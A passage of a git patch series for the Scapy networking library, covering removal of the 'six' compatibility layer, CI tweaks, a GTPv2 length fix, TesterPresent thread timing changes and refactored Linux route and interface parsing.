-141,7 +137,7 @@ def feed(self, can): if len(data) > 1 and self.use_ext_addr is not True: self._try_feed(can.identifier, None, data, can.time) if len(data) > 2 and self.use_ext_addr is not False: - ea = six.indexbytes(data, 0) + ea = data[0] self._try_feed(can.identifier, ea, data[1:], can.time) @property @@ -235,7 +231,7 @@ def _feed_single_frame(self, identifier, ea, data, ts): # At least 2 bytes are necessary: 1 for length and 1 for data return False - length = six.indexbytes(data, 0) & 0x0f + length = data[0] & 0x0f isotp_data = data[1:length + 1] if length > len(isotp_data): @@ -253,7 +249,7 @@ def _feed_consecutive_frame(self, identifier, ea, data): # 1 for data return False - first_byte = six.indexbytes(data, 0) + first_byte = data[0] seq_no = first_byte & 0x0f isotp_data = data[1:] @@ -303,7 +299,7 @@ def _feed_flow_control_frame(self, identifier, ea, data): def _try_feed(self, identifier, ea, data, ts): # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> None - first_byte = six.indexbytes(data, 0) + first_byte = data[0] if len(data) > 1 and first_byte & 0xf0 == N_PCI_SF: self._feed_single_frame(identifier, ea, data, ts) if len(data) > 2 and first_byte & 0xf0 == N_PCI_FF: diff --git a/scapy/contrib/ltp.py b/scapy/contrib/ltp.py index 1de7ed6a8d8..d8441b0ff4f 100755 --- a/scapy/contrib/ltp.py +++ b/scapy/contrib/ltp.py @@ -16,7 +16,6 @@ # scapy.contrib.description = Licklider Transmission Protocol (LTP) # scapy.contrib.status = loads -import scapy.libs.six as six from scapy.packet import Packet, bind_layers, bind_top_down from scapy.fields import BitEnumField, BitField, BitFieldLenField, \ ByteEnumField, ConditionalField, PacketListField, StrLenField @@ -100,7 +99,7 @@ def default_payload_class(self, pay): def _ltp_guess_payload(pkt, *args): - for k, v in six.iteritems(_ltp_payload_conditions): + for k, v in _ltp_payload_conditions.items(): if v(pkt): return k return conf.raw_layer diff --git a/scapy/contrib/macsec.py b/scapy/contrib/macsec.py index b3d805bc23b..5de694248d3 100755 --- a/scapy/contrib/macsec.py +++ b/scapy/contrib/macsec.py @@ -24,7 +24,6 @@ from scapy.compat import raw from scapy.data import ETH_P_MACSEC, ETHER_TYPES, ETH_P_IP, ETH_P_IPV6 from scapy.error import log_loading -import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.backends import default_backend @@ -50,7 +49,7 @@ class MACsecSA(object): of MACsec frames """ def __init__(self, sci, an, pn, key, icvlen, encrypt, send_sci, xpn_en=False, ssci=None, salt=None): # noqa: E501 - if isinstance(sci, six.integer_types): + if isinstance(sci, int): self.sci = struct.pack('!Q', sci) elif isinstance(sci, bytes): self.sci = sci @@ -65,7 +64,7 @@ def __init__(self, sci, an, pn, key, icvlen, encrypt, send_sci, xpn_en=False, ss self.xpn_en = xpn_en if self.xpn_en: # Get SSCI (32 bits) - if isinstance(ssci, six.integer_types): + if isinstance(ssci, int): self.ssci = struct.pack('!L', ssci) elif isinstance(ssci, bytes): self.ssci = ssci diff --git a/scapy/contrib/nfs.py b/scapy/contrib/nfs.py index 5f6ca940f56..faaa431f1ef 100644 --- a/scapy/contrib/nfs.py +++ b/scapy/contrib/nfs.py @@ -12,7 +12,6 @@ from scapy.fields import IntField, IntEnumField, FieldListField, LongField, \ XIntField, XLongField, ConditionalField, PacketListField, StrLenField, \ PacketField -from scapy.libs.six import integer_types nfsstat3 = { 0: 'NFS3_OK', @@ -58,7 +57,7 @@ def loct(x): - if isinstance(x, integer_types): + if isinstance(x, int): return oct(x) if isinstance(x, tuple): return "(%s)" % ", ".join(map(loct, x)) diff --git a/scapy/contrib/openflow.py b/scapy/contrib/openflow.py index 813c11c3e45..5acf33757e5 100755 --- a/scapy/contrib/openflow.py +++ b/scapy/contrib/openflow.py @@ -25,7 +25,6 @@ from scapy.layers.inet import TCP from scapy.packet import Packet, Raw, bind_bottom_up, bind_top_down from scapy.utils import binrepr -import scapy.libs.six as six # If prereq_autocomplete is True then match prerequisites will be @@ -716,7 +715,7 @@ class OFPTFeaturesRequest(_ofp_header): IntField("xid", 0)] -ofp_action_types_flags = [v for v in six.itervalues(ofp_action_types) +ofp_action_types_flags = [v for v in ofp_action_types.values() if v != 'OFPAT_VENDOR'] diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index 24db2a074c6..5fe0cf6e715 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -28,7 +28,6 @@ XIntField, XShortField, PacketLenField from scapy.layers.l2 import Ether from scapy.packet import Packet, Padding, Raw -import scapy.libs.six as six from scapy.contrib.openflow import _ofp_header, _ofp_header_item, \ OFPacketField, OpenFlow, _UnknownOpenFlow @@ -2516,7 +2515,7 @@ class OFPMPRequestGroupFeatures(_ofp_header): XIntField("pad1", 0)] -ofp_action_types_flags = [v for v in six.itervalues(ofp_action_types) +ofp_action_types_flags = [v for v in ofp_action_types.values() if v != 'OFPAT_EXPERIMENTER'] diff --git a/scapy/contrib/pnio.py b/scapy/contrib/pnio.py index af3f54a85de..0c5583cadb0 100644 --- a/scapy/contrib/pnio.py +++ b/scapy/contrib/pnio.py @@ -18,7 +18,6 @@ StrFixedLenField, ShortField, FlagsField, ByteField, XIntField, X3BytesField ) -import scapy.libs.six as six PNIO_FRAME_IDS = { 0x0020: "PTCP-RTSyncPDU-followup", @@ -77,7 +76,7 @@ def s2i_frameid(x): except KeyError: pass try: - return next(key for key, value in six.iteritems(PNIO_FRAME_IDS) + return next(key for key, value in PNIO_FRAME_IDS.items() if value == x) except StopIteration: pass diff --git a/scapy/contrib/ppi_geotag.py b/scapy/contrib/ppi_geotag.py index 9d133bfb1af..ecb8c226de8 100644 --- a/scapy/contrib/ppi_geotag.py +++ b/scapy/contrib/ppi_geotag.py @@ -22,7 +22,6 @@ UTCTimeField, XLEIntField, SignedByteField, XLEShortField from scapy.layers.ppi import PPI_Hdr, PPI_Element from scapy.error import warning -import scapy.libs.six as six CURR_GEOTAG_VER = 2 # Major revision of specification @@ -252,7 +251,7 @@ def __init__(self, name, default): def _FlagsList(myfields): flags = ["Reserved%02d" % i for i in range(32)] - for i, value in six.iteritems(myfields): + for i, value in myfields.items(): flags[i] = value return flags @@ -359,7 +358,7 @@ def __new__(cls, name, bases, dct): return x -class HCSIPacket(six.with_metaclass(_Geotag_metaclass, PPI_Element)): +class HCSIPacket(PPI_Element, metaclass=_Geotag_metaclass): def post_build(self, p, pay): if self.geotag_len is None: sl_g = struct.pack(' Date: Fri, 20 Jan 2023 20:58:41 +0100 Subject: [PATCH 0950/1632] utils: fix warning about using variable before assignment Partially fixes #3856 --- scapy/utils.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index a28836da325..d86d0a25cb3 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -242,10 +242,9 @@ def restart(): if not conf.interactive or not os.path.isfile(sys.argv[0]): raise OSError("Scapy was not started from console") if WINDOWS: + res_code = 1 try: res_code = subprocess.call([sys.executable] + sys.argv) - except KeyboardInterrupt: - res_code = 1 finally: os._exit(res_code) os.execv(sys.executable, [sys.executable] + sys.argv) From a9a0f88f97284f4689bcf73dfd1a122233dc11fb Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 19 Jan 2023 14:10:55 +0100 Subject: [PATCH 0951/1632] Appveyor: allow scanner builds to fail --- .appveyor.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.appveyor.yml b/.appveyor.yml index 873103b8a96..c3f0d173c39 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -18,6 +18,11 @@ environment: TOXENV: "py37-windows" UT_FLAGS: "-k scanner" +# allow scanner builds to fail +matrix: + allow_failures: + - UT_FLAGS: "-k scanner" + # There is no build phase for Scapy build: off From 33d3093e4ff6e4a5a300ca54876fb5d214a020e6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 24 Jan 2023 00:02:29 +0100 Subject: [PATCH 0952/1632] Disable ping tests on OSX --- .config/ci/test.sh | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 7a8a5548c17..ef365c723a9 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -12,12 +12,6 @@ then # Linux OSTOX="linux" UT_FLAGS+=" -K tshark" - if [ ! -z "$GITHUB_ACTIONS" ] - then - # Due to a security policy, the firewall of the Azure runner - # (Standard_DS2_v2) that runs Github Actions on Linux blocks ICMP. - UT_FLAGS+=" -K icmp_firewall" - fi if [ -z "$SIMPLE_TESTS" ] then # check vcan @@ -47,6 +41,13 @@ then fi fi +if [ ! -z "$GITHUB_ACTIONS" ] +then + # Due to a security policy, the firewall of the Azure runner + # (Standard_DS2_v2) that runs Github Actions on Linux blocks ICMP. + UT_FLAGS+=" -K icmp_firewall" +fi + # pypy if python --version 2>&1 | grep -q PyPy then From eba8ce4dcaf8efaebfc27fedb321b41d16cc3923 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 27 Jan 2023 23:45:34 +0100 Subject: [PATCH 0953/1632] Fix minor UT test (#3867) * fix-minor-test * Fix minor p0fv2 issue --- test/p0fv2.uts | 5 +++-- test/tftp.uts | 2 ++ 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/test/p0fv2.uts b/test/p0fv2.uts index 9d77547a509..3933f5ecfd1 100644 --- a/test/p0fv2.uts +++ b/test/p0fv2.uts @@ -21,7 +21,8 @@ except ImportError: def _load_database(file): for i in range(10): try: - open(file, 'wb').write(urlopen('https://raw.githubusercontent.com/p0f/p0f/4b4d1f384abebbb9b1b25b8f3c6df5ad7ab365f7/' + file).read()) + with open(file, 'wb') as fd: + fd.write(urlopen('https://raw.githubusercontent.com/p0f/p0f/4b4d1f384abebbb9b1b25b8f3c6df5ad7ab365f7/' + file).read()) break except: raise @@ -118,4 +119,4 @@ def _rem(f): _rem("p0f.fp") _rem("p0fa.fp") _rem("p0fr.fp") -_rem("p0fo.fp") \ No newline at end of file +_rem("p0fo.fp") diff --git a/test/tftp.uts b/test/tftp.uts index b8968457767..5c91caac314 100644 --- a/test/tftp.uts +++ b/test/tftp.uts @@ -43,6 +43,8 @@ class MockTFTPSocket(object): return pkt def send(self, *args, **kargs): pass + def close(self): + pass = TFTP_read() automaton From 0260f9705a85ad2805b5e8eb3d5d03500dbd2fb6 Mon Sep 17 00:00:00 2001 From: muelleme Date: Sun, 29 Jan 2023 17:06:37 +0100 Subject: [PATCH 0954/1632] Fix length calculation for GTPv2 header (#3833) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Fix length calculation for GTPv2 header 3GPP TS 29.274 states in Section 5.5.1: "Octets 3 to 4 represent the Message Length field. This field shall indicate the length of the message in octets excluding the mandatory part of the GTP-C header (the first 4 octets). The TEID (if present) and the Sequence Number shall be included in the length count." * Add comment on length in different GTP versions --------- Co-authored-by: Mike Müller --- scapy/contrib/gtp.py | 5 ++++- test/contrib/gtp_v2.uts | 5 +++++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 884a0693502..441638e9515 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -257,7 +257,10 @@ class GTPHeader(Packet): def post_build(self, p, pay): p += pay if self.length is None: - tmp_len = len(p) - 8 + # The message length field is calculated different in GTPv1 and GTPv2. # noqa: E501 + # For GTPv1 it is defined as the rest of the packet following the mandatory 8-byte GTP header # noqa: E501 + # For GTPv2 it is defined as the length of the message in bytes excluding the mandatory part of the GTP-C header (the first 4 bytes) # noqa: E501 + tmp_len = len(p) - 4 if self.version == 2 else len(p) - 8 p = p[:2] + struct.pack("!H", tmp_len) + p[4:] return p diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index eefdc57e956..e2339c8beb5 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -439,6 +439,11 @@ assert not (GTPHeader(seq=1)/GTPV2EchoResponse()).answers(GTPHeader(seq=1)/GTPV2 gtp = GTPHeader(gtp_type="create_session_req") / ("X"*32) gtp.show2() += GTPHeader length calculation +h = GTPHeader(seq=12345, version=2, T=1, teid=1234)/("X"*32) +h = GTPHeader(h.do_build()) +h[GTPHeader].length == len(bytes(h)) - 4 + = GTPHeader hashret req = GTPHeader(gtp_type="create_session_req", seq=1) / ("X"*32) res = GTPHeader(gtp_type="create_session_res", seq=1) / ("Y"*32) From 7e7eeee77d95c75daccf3184906c363c92300ed1 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 29 Jan 2023 17:14:15 +0100 Subject: [PATCH 0955/1632] Improvement of TesterPresentSenders (#3860) Co-authored-by: Nils Weiss --- scapy/contrib/automotive/gm/gmlanutils.py | 2 +- scapy/contrib/automotive/kwp.py | 8 +++++--- scapy/contrib/automotive/uds.py | 20 ++------------------ scapy/contrib/automotive/uds_scan.py | 2 +- scapy/utils.py | 2 +- 5 files changed, 10 insertions(+), 24 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index 27901297bbc..20e5bb43ef4 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -62,7 +62,7 @@ def run(self): while not self._stopped.is_set() and not self._socket.closed: for p in self._pkts: self._socket.sr1(p, verbose=False, timeout=0.1) - time.sleep(self._interval) + self._stopped.wait(timeout=self._interval) if self._stopped.is_set() or self._socket.closed: break diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py index 10679c9fdb5..6220d5c96f9 100644 --- a/scapy/contrib/automotive/kwp.py +++ b/scapy/contrib/automotive/kwp.py @@ -7,7 +7,6 @@ # scapy.contrib.status = loads import struct -import time from scapy.fields import ByteEnumField, StrField, ConditionalField, \ BitField, XByteField, X3BytesField, ByteField, \ @@ -974,7 +973,8 @@ def answers(self, other): # ################################################################## class KWP_TesterPresentSender(PeriodicSenderThread): - def __init__(self, sock, pkt=KWP() / KWP_TP(), interval=2): + def __init__(self, sock, pkt=KWP() / KWP_TP(responseRequired=0x02), + interval=2): # type: (Any, _PacketIterable, float) -> None """ Thread that sends TesterPresent packets periodically @@ -989,4 +989,6 @@ def run(self): while not self._stopped.is_set(): for p in self._pkts: self._socket.sr1(p, timeout=0.3, verbose=False) - time.sleep(self._interval) + self._stopped.wait(timeout=self._interval) + if self._stopped.is_set() or self._socket.closed: + break diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index e42e79db2e2..6139c8bd66f 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -7,9 +7,7 @@ # scapy.contrib.status = loads import struct -import time -from scapy.contrib.automotive import log_automotive from scapy.fields import ByteEnumField, StrField, ConditionalField, \ BitEnumField, BitField, XByteField, FieldListField, \ XShortField, X3BytesField, XIntField, ByteField, \ @@ -17,7 +15,7 @@ FieldLenField, XStrFixedLenField, XStrLenField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf -from scapy.error import log_loading, Scapy_Exception +from scapy.error import log_loading from scapy.utils import PeriodicSenderThread from scapy.contrib.isotp import ISOTP from scapy.compat import Dict, Union @@ -1384,7 +1382,7 @@ def answers(self, other): class UDS_TesterPresentSender(PeriodicSenderThread): - def __init__(self, sock, pkt=UDS() / UDS_TP(), interval=2): + def __init__(self, sock, pkt=UDS() / UDS_TP(subFunction=0x80), interval=2): """ Thread to send TesterPresent messages packets periodically Args: @@ -1393,17 +1391,3 @@ def __init__(self, sock, pkt=UDS() / UDS_TP(), interval=2): interval: interval between two packets """ PeriodicSenderThread.__init__(self, sock, pkt, interval) - - def run(self): - # type: () -> None - while not self._stopped.is_set() and not self._socket.closed: - for p in self._pkts: - try: - self._socket.sr1(p, timeout=0.3, verbose=False) - except (OSError, ValueError, Scapy_Exception) as e: - log_automotive.exception( - "Exception in TesterPresentSender: %s", e) - break - time.sleep(self._interval) - if self._stopped.is_set() or self._socket.closed: - break diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 277f809cc58..c8bd9852edf 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -209,7 +209,7 @@ def enter(socket, # type: _SocketUnion return True UDS_TPEnumerator.cleanup(socket, configuration) - configuration["tps"] = UDS_TesterPresentSender(socket) + configuration["tps"] = UDS_TesterPresentSender(socket, interval=3) configuration["tps"].start() return True diff --git a/scapy/utils.py b/scapy/utils.py index d86d0a25cb3..36454985eba 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -3164,7 +3164,7 @@ def run(self): while not self._stopped.is_set() and not self._socket.closed: for p in self._pkts: self._socket.send(p) - time.sleep(self._interval) + self._stopped.wait(timeout=self._interval) if self._stopped.is_set() or self._socket.closed: break From b66524e9573b8e1c08c28cb4bfee863a9b54fc1b Mon Sep 17 00:00:00 2001 From: "Matthias St. Pierre" Date: Wed, 18 Jan 2023 21:04:39 +0100 Subject: [PATCH 0956/1632] arch.linux: simplify proc file parsing - use a 'with' statement to simplify error handling - open proc files in text mode to avoid the need for decoding - use list comprehensions and tuple unpacking --- scapy/arch/linux.py | 90 +++++++++++++++++++-------------------------- 1 file changed, 38 insertions(+), 52 deletions(-) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 68606db2f1d..d847ed4da8f 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -131,21 +131,11 @@ def _get_if_list(): Function to read the interfaces from /proc/net/dev """ try: - f = open("/proc/net/dev", "rb") + with open("/proc/net/dev", "r") as f: + return [line.split(':', 1)[0].strip() for line in f.readlines()[2:]] except IOError: - try: - f.close() - except Exception: - pass log_loading.critical("Can't open /proc/net/dev !") return [] - lst = [] - f.readline() - f.readline() - for line in f: - lst.append(plain_str(line).split(":")[0].strip()) - f.close() - return lst def attach_filter(sock, bpf_filter, iface): @@ -239,7 +229,8 @@ def get_alias_address(iface_name, # type: str def read_routes(): # type: () -> List[Tuple[int, int, str, str, str, int]] try: - f = open("/proc/net/route", "rb") + with open("/proc/net/route", "r") as f: + entries = [line.split() for line in f] except IOError: log_loading.critical("Can't open /proc/net/route !") return [] @@ -250,10 +241,10 @@ def read_routes(): addrfamily = struct.unpack("h", ifreq[16:18])[0] if addrfamily == socket.AF_INET: ifreq2 = ioctl(s, SIOCGIFNETMASK, struct.pack("16s16x", conf.loopback_name.encode("utf8"))) # noqa: E501 - msk = socket.ntohl(struct.unpack("I", ifreq2[20:24])[0]) - dst = socket.ntohl(struct.unpack("I", ifreq[20:24])[0]) & msk + msk_int = socket.ntohl(struct.unpack("I", ifreq2[20:24])[0]) + dst_int = socket.ntohl(struct.unpack("I", ifreq[20:24])[0]) & msk_int ifaddr = scapy.utils.inet_ntoa(ifreq[20:24]) - routes.append((dst, msk, "0.0.0.0", conf.loopback_name, ifaddr, 1)) # noqa: E501 + routes.append((dst_int, msk_int, "0.0.0.0", conf.loopback_name, ifaddr, 1)) # noqa: E501 else: warning("Interface %s: unknown address family (%i)" % (conf.loopback_name, addrfamily)) # noqa: E501 except IOError as err: @@ -262,13 +253,11 @@ def read_routes(): else: warning("Interface %s: failed to get address config (%s)" % (conf.loopback_name, str(err))) # noqa: E501 - for line_b in f.readlines()[1:]: - line = plain_str(line_b) - iff, dst_b, gw, flags_b, _, _, metric_b, msk_b, _, _, _ = line.split() - flags = int(flags_b, 16) - if flags & RTF_UP == 0: + for iff, dst, gw, flags, _, _, metric, msk, _, _, _ in entries[1:]: + flags_int = int(flags, 16) + if flags_int & RTF_UP == 0: continue - if flags & RTF_REJECT: + if flags_int & RTF_REJECT: continue try: ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", iff.encode("utf8"))) # noqa: E501 @@ -285,19 +274,18 @@ def read_routes(): continue # Attempt to detect an interface alias based on addresses inconsistencies # noqa: E501 - dst_int = socket.htonl(int(dst_b, 16)) & 0xffffffff - msk_int = socket.htonl(int(msk_b, 16)) & 0xffffffff - gw_str = scapy.utils.inet_ntoa(struct.pack("I", int(gw, 16))) - metric = int(metric_b) + dst_int = socket.htonl(int(dst, 16)) & 0xffffffff + msk_int = socket.htonl(int(msk, 16)) & 0xffffffff + gw = scapy.utils.inet_ntoa(struct.pack("I", int(gw, 16))) + metric_int = int(metric) - route = (dst_int, msk_int, gw_str, iff, ifaddr, metric) + route = (dst_int, msk_int, gw, iff, ifaddr, metric_int) if ifaddr_int & msk_int != dst_int: - tmp_route = get_alias_address(iff, dst_int, gw_str, metric) + tmp_route = get_alias_address(iff, dst_int, gw, metric_int) if tmp_route: route = tmp_route routes.append(route) - f.close() s.close() return routes @@ -318,27 +306,27 @@ def in6_getifaddr(): """ ret = [] # type: List[Tuple[str, int, str]] try: - fdesc = open("/proc/net/if_inet6", "rb") + with open("/proc/net/if_inet6", "r") as f: + entries = [line.split() for line in f] except IOError: return ret - for line in fdesc: - # addr, index, plen, scope, flags, ifname - tmp = plain_str(line).split() + + for addr, _, _, scope, _, ifname in entries: addr = scapy.utils6.in6_ptop( b':'.join( - struct.unpack('4s4s4s4s4s4s4s4s', tmp[0].encode()) + struct.unpack('4s4s4s4s4s4s4s4s', addr.encode()) ).decode() ) # (addr, scope, iface) - ret.append((addr, int(tmp[3], 16), tmp[5])) - fdesc.close() + ret.append((addr, int(scope, 16), ifname)) return ret def read_routes6(): # type: () -> List[Tuple[str, int, str, str, List[str], int]] try: - f = open("/proc/net/ipv6_route", "rb") + with open("/proc/net/ipv6_route", "r") as f: + entries = [line.split() for line in f] except IOError: return [] # 1. destination network @@ -354,26 +342,24 @@ def read_routes6(): routes = [] def proc2r(p): - # type: (bytes) -> str - ret = struct.unpack('4s4s4s4s4s4s4s4s', p) + # type: (str) -> str + ret = struct.unpack('4s4s4s4s4s4s4s4s', p.encode()) addr = b':'.join(ret).decode() return scapy.utils6.in6_ptop(addr) lifaddr = in6_getifaddr() - for line in f.readlines(): - d_b, dp_b, _, _, nh_b, metric_b, rc, us, fl_b, dev_b = line.split() - metric = int(metric_b, 16) - fl = int(fl_b, 16) - dev = plain_str(dev_b) + for d, dp, _, _, nh, metric, _, _, fl, dev in entries: + metric_int = int(metric, 16) + fl_int = int(fl, 16) - if fl & RTF_UP == 0: + if fl_int & RTF_UP == 0: continue - if fl & RTF_REJECT: + if fl_int & RTF_REJECT: continue - d = proc2r(d_b) - dp = int(dp_b, 16) - nh = proc2r(nh_b) + d = proc2r(d) + dp_int = int(dp, 16) + nh = proc2r(nh) cset = [] # candidate set (possible source addresses) if dev == conf.loopback_name: @@ -382,11 +368,11 @@ def proc2r(p): cset = ['::1'] else: devaddrs = (x for x in lifaddr if x[2] == dev) - cset = scapy.utils6.construct_source_candidate_set(d, dp, devaddrs) + cset = scapy.utils6.construct_source_candidate_set(d, dp_int, devaddrs) if len(cset) != 0: - routes.append((d, dp, nh, dev, cset, metric)) - f.close() + routes.append((d, dp_int, nh, dev, cset, metric_int)) + return routes From 61bb22bff2d2d849814b885c80505557b6d656f3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 23 Jan 2023 22:42:44 +0100 Subject: [PATCH 0957/1632] Further cleanups --- scapy/arch/linux.py | 229 ++++++++++++++++++++++++-------------------- 1 file changed, 127 insertions(+), 102 deletions(-) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index d847ed4da8f..ca502961467 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -13,6 +13,7 @@ import array import ctypes +import itertools import os import socket import struct @@ -132,7 +133,8 @@ def _get_if_list(): """ try: with open("/proc/net/dev", "r") as f: - return [line.split(':', 1)[0].strip() for line in f.readlines()[2:]] + return [line.split(':', 1)[0].strip() + for line in itertools.islice(f, 2, None)] except IOError: log_loading.critical("Can't open /proc/net/dev !") return [] @@ -228,66 +230,89 @@ def get_alias_address(iface_name, # type: str def read_routes(): # type: () -> List[Tuple[int, int, str, str, str, int]] + """ + Read routes from /proc/net/route + """ try: - with open("/proc/net/route", "r") as f: - entries = [line.split() for line in f] + with open("/proc/net/route", "r", errors='replace') as f: + routes = [] + # Loopback route + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + try: + ifreq = ioctl(s, SIOCGIFADDR, + struct.pack("16s16x", conf.loopback_name.encode("utf8"))) + addrfamily = struct.unpack("h", ifreq[16:18])[0] + if addrfamily == socket.AF_INET: + ifreq2 = ioctl( + s, SIOCGIFNETMASK, + struct.pack("16s16x", conf.loopback_name.encode("utf8")) + ) + msk = socket.ntohl(struct.unpack("I", ifreq2[20:24])[0]) + dst = socket.ntohl(struct.unpack("I", ifreq[20:24])[0]) & msk + ifaddr = scapy.utils.inet_ntoa(ifreq[20:24]) + routes.append((dst, msk, "0.0.0.0", conf.loopback_name, + ifaddr, 1)) + else: + warning("Interface %s: unknown address family (%i)" % ( + conf.loopback_name, addrfamily + )) + except IOError as err: + if err.errno == 99: + warning("Interface %s: no address assigned" % conf.loopback_name) + else: + warning("Interface %s: failed to get address config (%s)" % ( + conf.loopback_name, str(err)) + ) + + # Load routes + for line in (x.split() for x in itertools.islice(f, 1, None)): + # line = iff, dst, gw, flags, _, _, metric, msk, _, _, _ + iff, gw = line[0], line[2] + dst, flags, msk = tuple( + int(x, 16) for x in [line[1], line[3], line[7]] + ) + metric = int(line[6]) + # Check iface flags + if flags & RTF_UP == 0: + continue + if flags & RTF_REJECT: + continue + try: + ifreq = ioctl(s, SIOCGIFADDR, + struct.pack("16s16x", iff.encode("utf8"))) + except IOError: + # interface is present in routing tables but does not + # have any assigned IP + ifaddr = "0.0.0.0" + ifaddr_int = 0 + else: + addrfamily = struct.unpack("h", ifreq[16:18])[0] + if addrfamily == socket.AF_INET: + ifaddr = scapy.utils.inet_ntoa(ifreq[20:24]) + ifaddr_int = struct.unpack("!I", ifreq[20:24])[0] + else: + warning("Interface %s: unknown address family (%i)", iff, addrfamily) # noqa: E501 + continue + + # Attempt to detect an interface alias based on addresses + # inconsistencies + dst = socket.htonl(dst) & 0xffffffff + msk = socket.htonl(msk) & 0xffffffff + gw = scapy.utils.inet_ntoa(struct.pack("I", int(gw, 16))) + + route = (dst, msk, gw, iff, ifaddr, metric) + if ifaddr_int & msk != dst: + tmp_route = get_alias_address(iff, dst, gw, metric) + if tmp_route: + route = tmp_route + routes.append(route) + + s.close() + return routes + except IOError: log_loading.critical("Can't open /proc/net/route !") return [] - routes = [] - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - try: - ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", conf.loopback_name.encode("utf8"))) # noqa: E501 - addrfamily = struct.unpack("h", ifreq[16:18])[0] - if addrfamily == socket.AF_INET: - ifreq2 = ioctl(s, SIOCGIFNETMASK, struct.pack("16s16x", conf.loopback_name.encode("utf8"))) # noqa: E501 - msk_int = socket.ntohl(struct.unpack("I", ifreq2[20:24])[0]) - dst_int = socket.ntohl(struct.unpack("I", ifreq[20:24])[0]) & msk_int - ifaddr = scapy.utils.inet_ntoa(ifreq[20:24]) - routes.append((dst_int, msk_int, "0.0.0.0", conf.loopback_name, ifaddr, 1)) # noqa: E501 - else: - warning("Interface %s: unknown address family (%i)" % (conf.loopback_name, addrfamily)) # noqa: E501 - except IOError as err: - if err.errno == 99: - warning("Interface %s: no address assigned" % conf.loopback_name) # noqa: E501 - else: - warning("Interface %s: failed to get address config (%s)" % (conf.loopback_name, str(err))) # noqa: E501 - - for iff, dst, gw, flags, _, _, metric, msk, _, _, _ in entries[1:]: - flags_int = int(flags, 16) - if flags_int & RTF_UP == 0: - continue - if flags_int & RTF_REJECT: - continue - try: - ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", iff.encode("utf8"))) # noqa: E501 - except IOError: # interface is present in routing tables but does not have any assigned IP # noqa: E501 - ifaddr = "0.0.0.0" - ifaddr_int = 0 - else: - addrfamily = struct.unpack("h", ifreq[16:18])[0] - if addrfamily == socket.AF_INET: - ifaddr = scapy.utils.inet_ntoa(ifreq[20:24]) - ifaddr_int = struct.unpack("!I", ifreq[20:24])[0] - else: - warning("Interface %s: unknown address family (%i)", iff, addrfamily) # noqa: E501 - continue - - # Attempt to detect an interface alias based on addresses inconsistencies # noqa: E501 - dst_int = socket.htonl(int(dst, 16)) & 0xffffffff - msk_int = socket.htonl(int(msk, 16)) & 0xffffffff - gw = scapy.utils.inet_ntoa(struct.pack("I", int(gw, 16))) - metric_int = int(metric) - - route = (dst_int, msk_int, gw, iff, ifaddr, metric_int) - if ifaddr_int & msk_int != dst_int: - tmp_route = get_alias_address(iff, dst_int, gw, metric_int) - if tmp_route: - route = tmp_route - routes.append(route) - - s.close() - return routes ############ # IPv6 # @@ -304,31 +329,28 @@ def in6_getifaddr(): This is the list of all addresses of all interfaces available on the system. """ - ret = [] # type: List[Tuple[str, int, str]] try: with open("/proc/net/if_inet6", "r") as f: - entries = [line.split() for line in f] + ret = [] # type: List[Tuple[str, int, str]] + for addr, _, _, scope, _, ifname in (x.split() for x in f): + addr = scapy.utils6.in6_ptop( + b':'.join( + struct.unpack('4s4s4s4s4s4s4s4s', addr.encode()) + ).decode() + ) + # (addr, scope, iface) + ret.append((addr, int(scope, 16), ifname)) + return ret except IOError: - return ret - - for addr, _, _, scope, _, ifname in entries: - addr = scapy.utils6.in6_ptop( - b':'.join( - struct.unpack('4s4s4s4s4s4s4s4s', addr.encode()) - ).decode() - ) - # (addr, 